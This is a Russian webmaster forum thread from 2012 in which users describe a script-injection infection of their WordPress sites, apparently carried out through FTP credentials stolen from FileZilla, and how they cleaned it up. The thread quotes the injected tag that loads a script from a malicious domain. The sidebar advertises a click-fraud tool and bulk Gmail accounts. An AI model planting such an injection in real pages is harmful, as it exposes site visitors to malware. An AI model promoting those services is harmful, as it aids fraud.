Вирус на сайте
Страницы: 1 2 След.
Вирус на сайте
Здравствуйте. Думаю, данную тему нужно прочитать всем, может кто-то найдёт у себя тоже подобную неприятность.И так.
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:

Код
 <script src="http://bdnbah.info/style.js"></script><script src="http://bdnbah.info/style.js"></script>


И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной  страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Была такая же проблема. Имхо, вирус\троян украл данные от FTP из FileZilla - там они не сильно шифруются насколько я в курсе.
Цитата
Дмитрий Иванов пишет:
украл данные от FTP из FileZilla
Я так тоже подумал, ибо у меня как раз этот клиент.Я его снёс нафиг, скачал свежую версию, и сейчас буду устанавливать... Хотя теперь стоит подумать. Может, какой другой клиент установить. Вы тем же самым пользуетесь?


Цитата
Дмитрий Иванов пишет:
Была такая же проблема.
Вы её устранили и... Больше подобная весчь не появлялась?
Сегодня устранил - вычистил вредоносный код из index.php и сменил все пароли - пока полет нормальный, отправил сайты на перепроверку в яндексе - он уже успел пометить парочку как потенциально опасные.

Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов, и на обоих прописался этот вирус. На остальных хостингах никаких проблем.

FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.
Я тоже подыскиваю фтп-клиент бесплатный. На файлзиллу возваращаться желания нет однозначно smile:(

Цитата
Дмитрий Иванов пишет:
FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.

Это дополнение к мозилле или есть полноценная программа? Там соединение шифруется по умолчанию? То есть доп. настроек делать не нужно?
Дополнение. При каждом запуске спрашивает мастер пароль которым и шифруются данные от FTP. Дополнительных настроек не нужно.
Цитата
Дмитрий Иванов пишет:
Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов
Ставьте "с запросом" и не будет проблем, имейте привычку менять пароли каждую неделю
Хостинг Beget на СУПРе
Здравствуйте, мой сайт joy-game.ru/ и его отправили в АГС за эту фигню. Как её убрать? FileZill(ой) не пользовался, в начале данного скрипта нету. Помогите пожалуйста. Кстати, хочу подчеркнуть, если ввести этот код в гугл или яндекс, то на форумах, просят о помощи после 10 марта 2012 года(Что и странно). И как можно убрать?
Цитата
grant1425 пишет:
просят о помощи после 10 марта 2012 года
Да кстати. Наплыв какой-то по вирусам. Нехорошая тенденция.
grant1425, Не стал открывать сайт.... что за ПП стоят на сайте? шаб откуда? сприпты с левых доменов ставили?
Роман, сайт не изменял 4 недели или даже больше. Не чего не было и вдруг где-то числа 11 вирусняк появился
grant1425, Вирусняк на ucoze smile:confused: это только вы сами могли натворить
Изменено: Роман - 13 Марта 2012 20:49
Роман, по твоему появился скрипт и все полезли его брать? И вирусы появились...
grant1425, Я хочу сказать, это полностью ваша вина, что подхватили какую то х. Смените шаблон, убейте Гротаторы
Спасибо за тему. Долго думал где он находится. Сразу что то не догадался глянуть в index
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
03:42 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения 
14:45 (затёр сайт)